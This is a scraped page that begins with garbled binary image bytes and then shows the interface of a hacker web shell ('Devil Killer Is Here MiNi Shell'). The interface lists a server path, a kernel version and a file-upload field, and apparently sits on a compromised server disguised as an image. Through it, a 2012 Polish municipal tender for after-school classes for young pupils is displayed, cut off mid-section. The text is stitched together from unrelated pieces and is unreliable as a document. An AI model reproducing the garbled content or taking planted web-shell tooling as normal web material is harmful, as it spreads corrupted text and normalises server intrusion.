JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120802/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120802/282668-N-2012.html

<p class="kh_header"><b>Żukowice: Usługi edukacyjne dla Szkół podstawowych z Gminy Żukowice w ramach projektu Indywidualizacja procesu nauczania i wychowania dla uczniów klas I-III szkoły podstawowej w kontekście nowej podstawy programowej kształcenia ogólnego.</b><br>
<b>Numer ogłoszenia: 282668 - 2012; data zamieszczenia: 02.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żukowice , Żukowice 92, 67-231 Żukowice, woj. dolnośląskie, tel. 0 76 831 42 41, faks 0 76 831 41 49.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zukowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi edukacyjne dla Szkół podstawowych z Gminy Żukowice w ramach projektu Indywidualizacja procesu nauczania i wychowania dla uczniów klas I-III szkoły podstawowej w kontekście nowej podstawy programowej kształcenia ogólnego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi  edukacyjne dla Szkół Podstawowych z Gminy Żukowice obejmująca prowadzenie zajęć pozalekcyjnych w ramach projektu: Indywidualizacja procesu nauczania i wychowania uczniów klas I-III w Gminie Żukowice w roku szkolnym 2012-2013 w szkołach podstawowych, dla których organem prowadzącym jest Gmina Żukowice.

Zakres zamówienia: Prowadzenie zajęć pozalekcyjnych w klasach I-III w dwóch szkołach podstawowych w ramach projektu Indywidualizacja procesu nauczania i wychowania uczniów klas I-III w Gminie Żukowice w roku szkolnym 2012 - 2013. Projekt realizowany będzie w ramach Programu Operacyjnego Kapitał Ludzki, priorytet IX Rozwój wykształcenia i kompetencji w regionach, poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.

Zamówienie obejmuje prowadzenie zajęć dla uczniów: 
- korekcyjno - kompensacyjnych ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji, 
- dydaktyczno - wyrównawczych z zaburzeniami umiejętności matematycznych, 
- logopedycznych z zaburzeniami rozwoju mowy, 
- rozwijających zainteresowania dla dzieci uzdolnionych w dziedzinie nauk matematyczno-przyrodniczych. 

Ze względu na specyfikę przedmiotu zamówienia konieczne jest prowadzenie zajęć z dziećmi z danej szkoły na terenie danej placówki przed rozpoczęciem lub po zakończeniu zajęć lekcyjnych wg opracowanego harmonogramu, który musi być uzgodniony z Dyrektorem Szkoły. Ponadto zajęcia muszą być prowadzone w oparciu o autorskie programy uwzględniające przeprowadzoną diagnozę potrzeb uczestników projektu. Zajęcia dla dzieci muszą trwać odpowiednio: - zajęcia specjalistyczne - 60 minut, - zajęcia dydaktyczno-wyrównawcze - 45 minut, - zajęcia rozwijające uzdolnienia - 45 minut. 
W ramach realizacji zamówienia przeprowadzone zostanie   w 2 szkołach 420 godzin zajęć edukacyjnych, w tym: 

Szkoła Podstawowa w Brzegu Głogowskim:

Część 1: Zajęcia korekcyjno - kompensacyjne dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji:
 a) przedmiot zajęć: zajęcia w formie grupowej i zindywidualizowanej - zniwelowanie trudności i niepowodzeń szkolnych poprzez usprawnienie percepcji słuchowej, wzrokowej, ćwiczenie koordynacji wzrokowo - ruchowej i sprawności manualnej, doskonalenie techniki czytania, utrwalenia zasad pisowni, stworzenie możliwości wszechstronnego rozwoju umysłowego, psychicznego i społecznego uczniów z
utrudnieniami rozwojowymi, na miarę ich możliwości, usprawnienie w zakresie funkcjonowania systemu percepcyjno- motorycznego, podniesienie poziomu sprawności językowej w zakresie mówienia, pisania i czytania;
b) ilość uczestników: 9  uczniów podzielonych na 2 grupy  -1 grupa -5  dzieci,  1 grupa  4 dzieci (4 dz. / 5 chł.) - 
c)  łączna ilość godzin - 60 godzin, każda po  45 minut.

Część 2: Zajęcia dydaktyczno - wyrównawcze dla dzieci z zaburzeniami umiejętności matematycznych: 
a) przedmiot zajęć: zajęcia w formie grupowej i zindywidualizowanej - wyrównanie braków w wiadomościach i umiejętnościach uczniów będących przyczyną ich trudności szkolnych, zachęcenie do zwiększenia wysiłku w uczeniu się matematyki, zniwelowanie przykrych doświadczeń związanych z porażkami w uczeniu się matematyki na lekcjach, zajęcia będą prowadzone w formie grupowej i zindywidualizowanej przez nauczyciela;
b) ilość uczestników - 9  uczniów podzielonych na 2 grupy  1 grupa 5 dzieci, 1 grupa 4 dzieci (4 dz. / 5 chł.) 
c) łączna ilość godzin - 60 godzin, każda po  45 minut.

Część 3: Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy:
a) przedmiot zajęć: zajęcia w formie grupowej i zindywidualizowanej prowadzone przez logopedę, które będą miały na celu skorygowanie wad wymowy, stymulowanie rozwoju mowy i języka tak, aby dzieci osiągnęły sprawność artykulacyjną, gramatyczną i leksykalną; 
b) ilość uczestników - 4  uczniów -  1 grupa  (4 chłopców)
c) łączna ilość godzin - 30 godzin, każda po 60 minut.

Część 4: Zajęcia dodatkowe rozwijające zainteresowania dla dzieci uzdolnionych w dziedzinie matematyczno - przyrodniczej :

a) przedmiot zajęć: zajęcia w formie grupowej rozwijające umiejętności twórczego i logicznego myślenia, kształcenia wyobraźni i fantazji, umiejętności przetwarzania zdobytych wiadomości i twórczego ich modyfikowania poprzez dostrzeganie i rozwiązywanie problemów, rozbudzanie ciekawości poznawczej, wdrażanie ucznia do samodzielnej pracy i doskonalenia własnych metod uczenia się;
b) ilość uczestników - 8  uczniów -  1 grupa  (5 dz./3 chł.)
c) łączna ilość godzin - 30 godzin, każda po 45 minut.

Szkoła Podstawowa im. KEN w Nielubi
Część 5: Zajęcia korekcyjno - kompensacyjne dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji :
a) przedmiot zajęć: zajęcia w formie grupowej i zindywidualizowanej - zniwelowanie trudności i niepowodzeń szkolnych poprzez usprawnienie percepcji słuchowej, wzrokowej, ćwiczenie koordynacji wzrokowo - ruchowej i sprawności manualnej, doskonalenie techniki czytania, utrwalenia zasad pisowni, stworzenie możliwości wszechstronnego rozwoju umysłowego, psychicznego i społecznego uczniów z
utrudnieniami rozwojowymi, na miarę ich możliwości, usprawnienie w zakresie funkcjonowania systemu percepcyjno- motorycznego, podniesienie poziomu sprawności językowej w zakresie mówienia, pisania i czytania;
b) ilość uczestników: 15  uczniów podzielonych na 3 grupy  -1 grupa 5  dzieci, 1 grupa 5 dzieci, 1 grupa 5 dzieci (7 dz. / 8 chł.)
c)  łączna ilość godzin - 90 godzin, każda po  45 minut.

Część 6: Zajęcia dydaktyczno - wyrównawcze dla dzieci z zaburzeniami umiejętności matematycznych :
a) przedmiot zajęć: zajęcia w formie grupowej i zindywidualizowanej - wyrównanie braków w wiadomościach i umiejętnościach uczniów będących przyczyną ich trudności szkolnych, zachęcenie do zwiększenia wysiłku w uczeniu się matematyki, zniwelowanie przykrych doświadczeń związanych z porażkami w uczeniu się matematyki na lekcjach, zajęcia będą prowadzone w formie grupowej i zindywidualizowanej przez nauczyciela;
b) ilość uczestników - 22  uczniów podzielonych na 3 grupy -  1 grupa 7  dzieci, 1 grupa 7 dzieci, 1 grupa 8 dzieci (9 dz. / 13 chł.)  
c) łączna ilość godzin - 90 godzin, każda po  45 minut.

Część 7: Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy:
a) przedmiot zajęć: zajęcia w formie grupowej i zindywidualizowanej prowadzone przez logopedę, które będą miały na celu skorygowanie wad wymowy, stymulowanie rozwoju mowy i języka tak, aby dzieci osiągnęły sprawność artykulacyjną, gramatyczną i leksykalną; 
b) ilość uczestników - 4  uczniów -  1 grupa  (2  dz./2 chł.)
c) łączna ilość godzin - 30 godzin, każda po 60 minut.

Część 8: Zajęcia dodatkowe rozwijające zainteresowania dla dzieci uzdolnionych w dziedzinie matematyczno - przyrodniczej :
a) przedmiot zajęć: zajęcia w formie grupowej rozwijające umiejętności twórczego i logicznego myślenia, kształcenia wyobraźni i fantazji, umiejętności przetwarzania zdobytych wiadomości i twórczego ich modyfikowania poprzez dostrzeganie i rozwiązywanie problemów, rozbudzanie ciekawości poznawczej, wdrażanie ucznia do samodzielnej pracy i doskonalenia własnych metod uczenia się;
b) ilość uczestników - 8  uczniów -  1 grupa  (4 dz./4 chł.)
c) łączna ilość godzin - 30 godzin, każda po 45 minut..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium w postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego opisu sposobu spełniania warunku dla żadnej z części zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego opisu sposobu spełniania warunku dla żadnej z części zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego opisu sposobu spełniania warunku dla żadnej z części zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda od Wykonawcy dysponowania co najmniej jedną osobą posiadającą kwalifikacje do prowadzenia danego typu zajęć, zgodnie  z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12.03.2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli, dla  każdej   z części w następującym zakresie:
Część 1:  edukacji wczesnoszkolnej, minimum 3 letnie doświadczenie w pracy z dziećmi w wieku 6-9 lat,
Część 2:  edukacji wczesnoszkolnej, minimum 3 letnie doświadczenie w pracy z dziećmi w wieku 6-9 lat,
Część 3:  logopedii ogólnej,
Część 4:  edukacji wczesnoszkolnej, minimum 3 letnie doświadczenie w pracy z dziećmi w wieku 6-9 lat,
Część 5:  edukacji wczesnoszkolnej, minimum 3 letnie doświadczenie w pracy z dziećmi w wieku 6-9 lat,
Część 6:  edukacji wczesnoszkolnej, minimum 3 letnie doświadczenie w pracy z dziećmi w wieku 6-9 lat,
Część 7:  logopedii ogólnej,
Część 8:  edukacji wczesnoszkolnej, minimum 3 letnie doświadczenie w pracy z dziećmi w wieku 6-9 lat,
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 
Zamawiający określając wymóg w zakresie posiadanych kwalifikacji, dopuszcza kwalifikacje, które zostały wydane na podstawie ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. Nr 63, poz. 394). Potencjalni Wykonawcy z innych państw członkowskich Unii Europejskiej mogą spełnić ten warunek posiadając równoważne uprawnienia uzyskane w swoich krajach pochodzenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego opisu sposobu spełniania warunku dla żadnej z części zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Kompletna oferta musi zawierać:
a)Formularz oferty, sporządzony na podstawie wzoru stanowiącego załącznik nr 1  do SIWZ.
b)pełnomocnictwo(a) - w przypadku, o ile ofertę składa pełnomocnik. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego,
c)oświadczenia i dokumenty wymienione w pkt 6 niniejszej SIWZ, UWAGA: Jeśli Wykonawca składa oferty w jednej kopercie to niezależnie od ilości części na które wykonawca składa ofertę, załącza:
-tylko jedno oświadczenie o spełnianiu warunków udziału w postępowaniu ze wskazaniem części zamówienia których ono dotyczy (np. część 1- tytuł, część 2- tytuł itd.),
-tylko jedno oświadczenie o nie podleganiu wykluczeniu  z postępowania ze wskazaniem części  których ono dotyczy, (np. część 1- tytuł, część 2- tytuł itd.),
-tylko jeden wypis z właściwego rejestru lub jedno oświadczenie (załącznik nr 5) ze wskazaniem części zamówienia których ono dotyczy. (np. część 1- tytuł, część 2- tytuł itd.)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający działając w oparciu o art. 144 ust. 1 ustawy Pzp określa następujące okoliczności, które mogą powodować konieczność wprowadzenia zmian treści zawartej umowy w stosunku do treści złożonej oferty:
-Zamawiający dopuszcza możliwość zmiany wynagrodzenia brutto w części dotyczącej podatku VAT, jeżeli w okresie realizacji umowy ulegnie zmianie w drodze ustawowej stawka podatku VAT, będąca elementem wynagrodzenia Wykonawcy. Zmiana zostanie wprowadzona na umotywowany wniosek Wykonawcy w formie aneksu do umowy.
- W razie niemożności przeprowadzenia zajęć przez Wykonawcę (np. zwolnienie lekarskie, zdarzenie losowe), będzie on mógł we własnym zakresie zapewnić zastąpienie go przez inną osobę. Osoba zastępująca winna spełniać wymagania określone w SIWZ. O zmianie takiej Wykonawca zobowiązany jest uprzednio poinformować Zamawiającego na piśmie w celu uzgodnienia zastępstwa.
-  Inne zmiany, których nie można było przewidzieć w chwili zawierania umowy przy dochowaniu należytej staranności.
- Zmiany które są korzystne dla Zamawiającego.

Wszelkie zmiany i uzupełnienia treści umowy wymagają formy pisemnej pod rygorem nieważności i mogą być dokonane wyłącznie, gdy nie wymagają zmiany treści oferty Wykonawcy, bądź gdy są korzystne dla Zamawiającego, bądź też gdy konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sbip.pl/nzukowice<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Żukowice, 67-231 Żukowice 92 pok. nr 10..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.08.2012 godzina 10:00, miejsce: Urząd Gminy Żukowice, 67-231 Żukowice 92 pok. nr 10 (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Tak. Program Operacyjny Kapitał Ludzki, Projekt Indywidualizacja procesu nauczania i wychowania dla uczniów klas I-III szkoły podstawowej w kontekście nowej podstawy programowej kształcenia ogólnego. Priorytet IX. Rozwój wykształcenia i kompetencji w regionach Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1: Zajęcia korekcyjno - kompensacyjne dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkoła Podstawowa w Brzegu Głogowskim:

Część 1: Zajęcia korekcyjno - kompensacyjne dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji:
 a) przedmiot zajęć: zajęcia w formie grupowej i zindywidualizowanej - zniwelowanie trudności i niepowodzeń szkolnych poprzez usprawnienie percepcji słuchowej, wzrokowej, ćwiczenie koordynacji wzrokowo - ruchowej i sprawności manualnej, doskonalenie techniki czytania, utrwalenia zasad pisowni, stworzenie możliwości wszechstronnego rozwoju umysłowego, psychicznego i społecznego uczniów z
utrudnieniami rozwojowymi, na miarę ich możliwości, usprawnienie w zakresie funkcjonowania systemu percepcyjno- motorycznego, podniesienie poziomu sprawności językowej w zakresie mówienia, pisania i czytania;
b) ilość uczestników: 9  uczniów podzielonych na 2 grupy  -1 grupa -5  dzieci,  1 grupa  4 dzieci (4 dz. / 5 chł.) - 
c)  łączna ilość godzin - 60 godzin, każda po  45 minut..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zajęcia dydaktyczno - wyrównawcze dla dzieci z zaburzeniami umiejętności matematycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2: Zajęcia dydaktyczno - wyrównawcze dla dzieci z zaburzeniami umiejętności matematycznych: 
